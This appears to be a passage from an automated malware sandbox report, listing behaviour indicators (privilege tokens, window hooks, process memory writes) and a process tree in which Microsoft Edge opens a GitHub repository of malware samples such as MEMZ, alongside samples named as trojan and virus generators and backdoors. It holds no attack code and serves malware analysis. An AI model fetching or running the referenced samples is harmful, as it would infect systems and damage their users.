server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe Token: SeIncBasePriorityPrivilege 4888 server.exe Token: 33 4888 server.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 3832 msedge.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe 516 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3944 M.exe 3944 M.exe 1436 server.exe 1436 server.exe 5108 DarkHorseTrojanVirusMaker.exe 5108 DarkHorseTrojanVirusMaker.exe 4736 Backdoor.exe 748 Backdoor(np).exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 1800 666.exe 5836 MasterSlave.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3832 wrote to memory of 3888 3832 msedge.exe 85 PID 3832 wrote to memory of 3888 3832 msedge.exe 85 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1260 3832 msedge.exe 86 PID 3832 wrote to memory of 1124 3832 msedge.exe 87 PID 3832 wrote to memory of 1124 3832 msedge.exe 87 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88 PID 3832 wrote to memory of 5052 3832 msedge.exe 88
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Viper4K/malware/tree/master/MEMZ1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847182⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:22⤵PID:1260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:82⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:12⤵PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:3892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5464 /prefetch:82⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:12⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3148 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:12⤵PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1848 /prefetch:12⤵PID:2028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:12⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:12⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6884 /prefetch:82⤵PID:2144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:12⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:12⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:1724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:12⤵PID:5900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:12⤵PID:6244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8540 /prefetch:12⤵PID:6332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:12⤵PID:6732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:12⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:12⤵PID:6920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:12⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:12⤵PID:6560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8444 /prefetch:12⤵PID:1320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8920 /prefetch:12⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:12⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9112 /prefetch:12⤵PID:7956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9604 /prefetch:12⤵PID:8112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9696 /prefetch:12⤵PID:7532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:12⤵PID:8096
-
-
